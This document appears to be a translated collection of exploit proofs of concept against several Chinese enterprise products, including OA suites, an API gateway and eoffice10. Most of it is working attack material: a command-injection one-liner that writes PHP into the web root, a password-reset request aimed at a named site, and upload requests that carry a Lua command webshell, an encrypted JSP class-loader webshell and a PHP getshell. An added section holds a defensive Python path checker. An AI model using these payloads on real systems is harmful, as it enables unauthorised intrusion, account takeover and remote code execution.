某信 Internet Behavior Management System

One-liner:
/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
Base64 version:
/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-d%20%3E%3E%20/var/www/html/1.php%0a

某数据大脑 API gateway arbitrary password reset vulnerability

某数据大脑 API (https://www.websaas.cn/) is affected by an arbitrary password reset vulnerability; the site https://waf-mgmt.pinganyun.com/q/#/ is used as the example here.
The frontend code contains the password reset endpoint and the password encryption scheme.
Following the frontend code, construct the password reset request:
// the password set by this reset is: p@ssw0rd
POST /q/common-permission/public/users/forgetPassword HTTP/1.1
Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Language: en-US,en;q=0.5
Content-type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104

{"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"username":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}

某擎 arbitrary file upload

/api/client_upload_file.json
POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=12345678901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
Host: 192.168.11.210
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 323
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ
Referer: http://192.168.11.210
Accept-Encoding: gzip

------WebKitFormBoundaryLx7ATxHThfk91oxQ
Content-Disposition: form-data; name="file"; filename="flash.php"
Content-Type: application/xxxx

if ngx.req.get_uri_args().cmd then
    cmd = ngx.req.get_uri_args().cmd
    local t = io.popen(cmd)
    local a = t:read("*all")
    ngx.say(a)
end
------WebKitFormBoundaryLx7ATxHThfk91oxQ--

某户 OA /defaultroot/officeserverservlet file upload

POST /defaultroot/officeserverservlet HTTP/1.1
Host: XXXXXXXXX:7001
Content-Length: 782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://XXXXXXXX7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cookie: OASESSIONID=CC676F4D1C584324CEFE311E71F2EA08; LocLan=zh_CN
Connection: close

DBSTEP V3.0 170 0 1000 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA==
111111111111111111111111111111111111111
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="892368804b205b83";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

DBSTEP V3.0 170 0 1000
170 controls the offset in the message from which the file content is read;
1000 controls the size of the webshell source code.
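As an added defensive example (not part of the original write-up), the following Python decodes the base64 key=value fields of a DBSTEP-style upload body like the one above and flags a decoded target path that traverses directories or ends in a server-executable extension; the same check is applied to the filename query parameter of the 某擎 upload request earlier on this page. Field names (OPTION, FILETYPE, FILENAME) are taken from the requests on this page; the sample body and request line are constructed, and the extension list is an assumption.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# A ".." path segment, and the server-executable extensions seen in this page's requests
# (the extension list is an assumption; extend it for the target platform).
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
EXEC_EXT = re.compile(r"\.(jspx?|php\d?|phtml|luac?)$", re.I)
FIELD = re.compile(r"\b([A-Za-z]+)=(\S*)\s*$")   # KEY=base64 at the end of a line
PATH_FIELDS = ("FILETYPE", "FILENAME")           # fields that carry a target path

def decode_dbstep_fields(body: str) -> dict:
    """Map KEY -> decoded value for the KEY=base64 fields of a DBSTEP body (the
    header line carries its own DBSTEP=... field). Invalid base64 is kept raw."""
    fields = {}
    for line in body.splitlines():
        m = FIELD.search(line)
        if m:
            key, raw = m.groups()
            try:
                fields[key] = base64.b64decode(raw, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                fields[key] = raw
    return fields

def flag_path(path: str) -> list:
    """Findings for one client-supplied file path."""
    findings = []
    if TRAVERSAL.search(path):
        findings.append("traversal")
    if EXEC_EXT.search(path):
        findings.append("executable-extension")
    return findings

def inspect_dbstep(body: str) -> dict:
    """Findings per path-bearing field of a DBSTEP body, after base64 decoding."""
    fields = decode_dbstep_fields(body)
    return {k: flag_path(fields[k]) for k in PATH_FIELDS if flag_path(fields.get(k, ""))}

def inspect_upload_url(request_line: str) -> dict:
    """Findings for filename-like query parameters of an upload request line."""
    query = parse_qs(urlsplit(request_line.split()[1]).query)
    return {k: flag_path(unquote(v[0])) for k, v in query.items()
            if k.lower() in ("filename", "file") and flag_path(unquote(v[0]))}

# Constructed samples mirroring the requests on this page.
SAMPLE_DBSTEP = ("DBSTEP V3.0 170 0 1000 DBSTEP=REJTVEVQ\nOPTION=U0FWRUZJTEU=\n"
                 "RECORDID=\nisDoc=dHJ1ZQ==\nFILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA==\n")
SAMPLE_REQ = "POST /api/client_upload_file.json?mid=1&md5=1&filename=../../lua/123.LUAC HTTP/1.1"
```

Both checks only see what the client sent; on the server side the decisive control is to resolve the target path against the upload directory and reject anything that escapes it, rather than to rely on pattern matching alone.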

某微 OA /workrelate/plan/util/uploaderOperate.jsp file upload

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 393

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="secId"

1
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"

Test
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="plandetailid"

1
------WebKitFormBoundarymVk33liI64J7GQaK--

2. Release the file into the web root: replace the fileid in the following request.
POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="aaa"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
------WebKitFormBoundarymVk33liI64J7GQaK--

某微 eoffice10 unauthenticated getshell (eoffice10/version.json)

Version: http://XXXXXXX:8010/eoffice10/version.json

<form method='post' action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php' enctype="multipart/form-data">
  <input type="file" name="FileData"/><br/><br/>
  <input type="text" name="FormData" value="1"/><br/><br/>
  <button type="submit" value="上传">上传</button>
</form>

Shell: http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: XXXXXXXX:8010
Content-Length: 378
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg

<?php echo md5(1);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"

{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--